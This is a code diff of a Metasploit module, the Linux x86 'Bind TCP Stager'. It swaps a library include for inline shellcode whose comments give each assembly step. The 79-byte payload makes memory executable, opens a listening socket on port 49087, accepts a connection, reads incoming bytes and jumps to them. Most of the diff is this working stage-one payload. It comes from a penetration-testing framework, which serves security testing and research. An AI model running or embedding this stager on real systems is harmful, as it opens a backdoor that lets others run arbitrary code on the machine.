|
6 | 6 |
|
7 | 7 | require 'msf/core' |
8 | 8 | require 'msf/core/handler/bind_tcp' |
9 | | -require 'msf/core/payload/linux/bind_tcp' |
10 | 9 |
|
11 | | -module Metasploit4 |
12 | 10 |
|
13 | | - CachedSize = :dynamic |
| 11 | +### |
| 12 | +# |
| 13 | +# BindTcp |
| 14 | +# ------- |
| 15 | +# |
| 16 | +# Linux bind TCP stager. |
| 17 | +# |
| 18 | +### |
| 19 | +module Metasploit3 |
| 20 | + |
| 21 | + CachedSize = 79 |
14 | 22 |
|
15 | 23 | include Msf::Payload::Stager |
16 | | - include Msf::Payload::Linux::BindTcp |
| 24 | + include Msf::Payload::Linux |
17 | 25 |
|
18 | 26 | def initialize(info = {}) |
19 | 27 | super(merge_info(info, |
20 | | - 'Name' => 'Bind TCP Stager (Linux x86)', |
21 | | - 'Description' => 'Listen for a connection (Linux x86)', |
22 | | - 'Author' => [ 'skape', 'egypt', ], |
| 28 | + 'Name' => 'Bind TCP Stager', |
| 29 | + 'Description' => 'Listen for a connection', |
| 30 | + 'Author' => [ |
| 31 | + 'skape', # original |
| 32 | + 'egypt', # NX support |
| 33 | + ], |
23 | 34 | 'License' => MSF_LICENSE, |
24 | 35 | 'Platform' => 'linux', |
25 | 36 | 'Arch' => ARCH_X86, |
26 | 37 | 'Handler' => Msf::Handler::BindTcp, |
27 | | - 'Convention' => 'sockedi', |
28 | | - 'Stager' => { 'RequiresMidstager' => true } |
| 38 | + 'Stager' => |
| 39 | + { |
| 40 | + 'Offsets' => |
| 41 | + { |
| 42 | + 'LPORT' => [ 0x29, 'n' ], |
| 43 | + }, |
| 44 | + 'Payload' => |
| 45 | + |
| 46 | + "\x6a\x7d" +# push byte +0x7d |
| 47 | + "\x58" +# pop eax |
| 48 | + "\x99" +# cdq |
| 49 | + "\xb2\x07" +# mov dl,0x7 |
| 50 | + "\xb9\x00\x10\x00\x00" +# mov ecx,0x1000 |
| 51 | + "\x89\xe3" +# mov ebx,esp |
| 52 | + "\x66\x81\xe3\x00\xf0" +# and bx,0xf000 |
| 53 | + "\xcd\x80" +# int 0x80 |
| 54 | + "\x31\xdb" +# xor ebx,ebx |
| 55 | + "\xf7\xe3" +# mul ebx |
| 56 | + "\x53" +# push ebx |
| 57 | + "\x43" +# inc ebx |
| 58 | + "\x53" +# push ebx |
| 59 | + "\x6a\x02" +# push byte +0x2 |
| 60 | + "\x89\xe1" +# mov ecx,esp |
| 61 | + "\xb0\x66" +# mov al,0x66 |
| 62 | + "\xcd\x80" +# int 0x80 |
| 63 | + "\x5b" +# pop ebx |
| 64 | + "\x5e" +# pop esi |
| 65 | + "\x52" +# push edx |
| 66 | + "\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002 |
| 67 | + "\x6a\x10" +# push byte +0x10 |
| 68 | + "\x51" +# push ecx |
| 69 | + "\x50" +# push eax |
| 70 | + "\x89\xe1" +# mov ecx,esp |
| 71 | + "\x6a\x66" +# push byte +0x66 |
| 72 | + "\x58" +# pop eax |
| 73 | + "\xcd\x80" +# int 0x80 |
| 74 | + "\xd1\xe3" +# shl ebx,1 |
| 75 | + "\xb0\x66" +# mov al,0x66 |
| 76 | + "\xcd\x80" +# int 0x80 |
| 77 | + "\x43" +# inc ebx |
| 78 | + "\xb0\x66" +# mov al,0x66 |
| 79 | + "\x89\x51\x04" +# mov [ecx+0x4],edx |
| 80 | + "\xcd\x80" +# int 0x80 |
| 81 | + "\x93" +# xchg eax,ebx |
| 82 | + "\xb6\x0c" +# mov dh,0xc |
| 83 | + "\xb0\x03" +# mov al,0x3 |
| 84 | + "\xcd\x80" +# int 0x80 |
| 85 | + "\x89\xdf" +# mov edi,ebx |
| 86 | + "\xff\xe1" # jmp ecx |
| 87 | + |
| 88 | + } |
29 | 89 | )) |
30 | 90 | end |
31 | 91 |
|
|
0 commit comments